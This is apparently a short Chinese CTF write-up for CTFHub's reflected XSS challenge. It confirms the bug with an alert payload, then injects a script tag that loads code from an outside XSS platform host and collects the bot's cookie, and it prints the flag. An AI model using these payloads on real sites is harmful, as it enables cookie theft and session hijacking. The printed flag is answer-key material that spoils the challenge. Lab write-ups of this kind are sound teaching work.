反射型XSS

发表于2021-12-05|更新于2022-02-01|CTF

|字数总计:234|阅读时长:1分钟|阅读量:

一、寻找漏洞

在搜索框中随意输入字符，发现输入的字符直接出现在界面上。
然后输入特殊字符进行尝试

1 2	<script>alert(1)</script> //括号里的1可以为任意字符，将显示在弹窗界面上

出现了弹窗，表明网页没有对用户的输入进行处理，直接输出到界面上。
XSS漏洞出现。

二、实施攻击

在第一个搜索框中输入下面构造的payload，并点击submit

1 2	</textarea>'"><script src=http://xsscom.com//a0zR72></script> //这个payload将执行http://xsscom.com//a0zR72下的项目代码

然后在网页源代码中查找到这个payload是完整的，同时submit点击之后，URL发生改变。

将改变后的URL在第二个搜索框中输入并send

此时XSS platform收到了报文，在cookies中发现了flag

cookie : flag=ctfhub{3efc235465db70e45070d143}

文章作者: Sigma

文章链接: https://s1gma0.github.io/2021/12/05/%E5%8F%8D%E5%B0%84%E5%9E%8BXSS/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sigma！

Web XSS WriteUp CTFHub

本地搜索